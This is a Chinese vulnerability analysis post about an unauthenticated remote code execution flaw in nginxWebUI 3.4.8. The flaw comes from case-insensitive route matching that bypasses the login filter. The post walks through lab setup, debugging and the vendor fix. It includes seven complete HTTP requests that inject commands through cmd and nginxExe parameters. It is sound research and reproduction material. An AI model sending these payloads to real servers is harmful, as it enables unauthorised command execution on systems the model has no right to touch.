nginxWebUI runCmd 未授权远程代码执行

渗透技巧 1年前 (2023) admin
338 0 0

nginxWebUI runCmd 未授权远程代码执行

nginxWebUI runCmd 未授权远程代码执行

01

漏洞简介


之前对 nginxWebUI 进行过搭建和审计,但是当时仅仅关注到了后台的一些命令执行漏洞,最近爆出了未授权远程代码执行,再一次进行搭建环境和分析。


02

环境搭建


https://github.com/cym1102/nginxWebUI/releases/download/3.4.8/nginxWebUI-3.4.8.jarjava -jar -Dfile.encoding=UTF-8 D:/home/nginxWebUI/nginxWebUI-3.4.8.jar --server.port=8080 --project.home=D:/home/nginxWebUI/


nginxWebUI runCmd 未授权远程代码执行
nginxWebUI runCmd 未授权远程代码执行

03

漏洞复现


我们利用网上公开的payload 进行测试

http://127.0.0.1:8080/AdminPage/conf/runCmd?cmd=calc%26%26nginx


nginxWebUI runCmd 未授权远程代码执行

04

漏洞分析


Solon 路由器对 url 的匹配默认是 “忽略大小写” 的


nginxWebUI runCmd 未授权远程代码执行

05

调试分析


java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005  -jar -Dfile.encoding=UTF-8 D:/home/nginxWebUI/nginxWebUI-3.4.8.jar --server.port=8080 --project.home=D:/home/nginxWebUI/


com.cym.config.AppFilter#doFilter

nginxWebUI runCmd 未授权远程代码执行


传入的路由与设置的匹配条件均不满足,继续进行匹配


org.noear.solon.core.route.RoutingTableDefault#matchOne

nginxWebUI runCmd 未授权远程代码执行

在 solon 中将传入的路径与系统中路径依次进行匹配比较,因为大小写的不敏感,所以会匹配成功

com.cym.controller.adminPage.ConfController#runCmd

nginxWebUI runCmd 未授权远程代码执行


当到达函数 runCmd 时 cmd 参数可控,进行了一部分校验和过滤 只有cmd 中存在字符串 nginx 才可以继续执行,利用 && 来实现命令的拼接


cn.hutool.core.util.RuntimeUtil#exec(String…)

nginxWebUI runCmd 未授权远程代码执行

06

漏洞修复


我们看到对漏洞针对性的修复操作是,将路由全部转换为小写再进行匹配校验


nginxWebUI runCmd 未授权远程代码执行


感觉没有官方提供的修复方式更简便些


结合目前未授权的情况,以及之前分析到的后台 RCE ,在这里做一个汇总,并进行一个比较简单的分析


「命令执行一」


GET /AdminPage/conf/runCmd?cmd=calc%26%26nginx HTTP/1.1Host: 127.0.0.1:8080Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Origin: http://127.0.0.1:8080Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8080/adminPage/remoteAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close


nginxWebUI runCmd 未授权远程代码执行

com.cym.controller.adminPage.ConfController#runCmd

nginxWebUI runCmd 未授权远程代码执行


当到达函数 runCmd 时 cmd 参数可控,进行了一部分校验和过滤 只有cmd 中存在字符串 nginx 才可以继续执行,利用 && 来实现命令的拼接

「命令执行二」

POST /AdminPage/remote/cmdOver HTTP/1.1Host: 127.0.0.1:8080Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Origin: http://127.0.0.1:8080Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8080/adminPage/remoteAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 51
remoteId=local&cmd=start calc%26%26nginx&interval=1


nginxWebUI runCmd 未授权远程代码执行


com.cym.controller.adminPage.RemoteController#cmdOver

nginxWebUI runCmd 未授权远程代码执行

当满足传入的参数所对应的值时,最终会调用 com.cym.controller.adminPage.ConfController#runCmd


com.cym.controller.adminPage.ConfController#runCmd

nginxWebUI runCmd 未授权远程代码执行


当到达函数 runCmd 时 cmd 参数可控,进行了一部分校验和过滤 只有cmd 中存在字符串 nginx 才可以继续执行,利用 && 来实现命令的拼接


「命令执行三」

POST /Api/nginx/runNginxCmd HTTP/1.1Host: 127.0.0.1:8080Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Origin: http://127.0.0.1:8080Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8080/adminPage/remoteAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 19
cmd=calc%26%26nginx


nginxWebUI runCmd 未授权远程代码执行


com.cym.controller.api.NginxApiController#runNginxCmd

nginxWebUI runCmd 未授权远程代码执行


com.cym.controller.adminPage.ConfController#runCmd

nginxWebUI runCmd 未授权远程代码执行


当到达函数 runCmd 时 cmd 参数可控,进行了一部分校验和过滤 只有cmd 中存在字符串 nginx 才可以继续执行,利用 && 来实现命令的拼接

「命令执行四」

GET /AdminPage/conf/reload?nginxExe=calc%20%7C HTTP/1.1Host: 127.0.0.1:8080Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Origin: http://127.0.0.1:8080Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8080/adminPage/remoteAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close


nginxWebUI runCmd 未授权远程代码执行


com.cym.controller.adminPage.ConfController#reload

nginxWebUI runCmd 未授权远程代码执行

「命令执行五」


POST /AdminPage/conf/check HTTP/1.1Host: 127.0.0.1:8080Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Origin: http://127.0.0.1:8080Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8080/adminPage/remoteAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 91
nginxExe=calc%20%7C&json={"nginxContent":"","subContent":"[]","subName":"[]"}&nginxPath=/1/


nginxWebUI runCmd 未授权远程代码执行


com.cym.controller.adminPage.ConfController#check

nginxWebUI runCmd 未授权远程代码执行


要满足很多条件才可以触发


「命令执行六」

POST /AdminPage/conf/saveCmd HTTP/1.1Host: 127.0.0.1:8080Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Origin: http://127.0.0.1:8080Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8080/adminPage/remoteAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 42
nginxExe=calc%20%7C&nginxPath=/&nginxDir=/


nginxWebUI runCmd 未授权远程代码执行


com.cym.controller.adminPage.ConfController#saveCmd

nginxWebUI runCmd 未授权远程代码执行


将参数设置为配置信息


GET /AdminPage/conf/checkBase HTTP/1.1Host: 127.0.0.1:8080Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Origin: http://127.0.0.1:8080Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8080/adminPage/remoteAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close


nginxWebUI runCmd 未授权远程代码执行


从配置信息中读取并加载,执行命令


com.cym.controller.adminPage.ConfController#checkBase

nginxWebUI runCmd 未授权远程代码执行

「命令执行七」


POST /AdminPage/conf/saveCmd HTTP/1.1Host: 127.0.0.1:8080Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Origin: http://127.0.0.1:8080Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8080/adminPage/remoteAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 42
nginxExe=calc%20%7C&nginxPath=/&nginxDir=/


nginxWebUI runCmd 未授权远程代码执行

GET /Api/nginx/check HTTP/1.1Host: 127.0.0.1:8080Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Origin: http://127.0.0.1:8080Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://127.0.0.1:8080/adminPage/remoteAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close


nginxWebUI runCmd 未授权远程代码执行


往期推荐

nginxWebUI runCmd 未授权远程代码执行

nginxWebUI runCmd 未授权远程代码执行

nginxWebUI runCmd 未授权远程代码执行


nginxWebUI runCmd 未授权远程代码执行

火线Zone是火线安全平台运营的安全社区,拥有超过20,000名可信白帽安全专家,内容涵盖渗透测试、红蓝对抗、漏洞分析、代码审计、漏洞复现等热门主题,旨在研究讨论实战攻防技术,助力社区安全专家技术成长,2年内已贡献1300+原创攻防内容,提交了100,000+原创安全漏洞。

欢迎具备分享和探索精神的你加入火线Zone社区,一起分享技术干货,共建一个有技术氛围的优质安全社区!


原文始发于微信公众号(火线Zone):nginxWebUI runCmd 未授权远程代码执行

版权声明:admin 发表于 2023年7月7日 下午5:41。
转载请注明:nginxWebUI runCmd 未授权远程代码执行 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...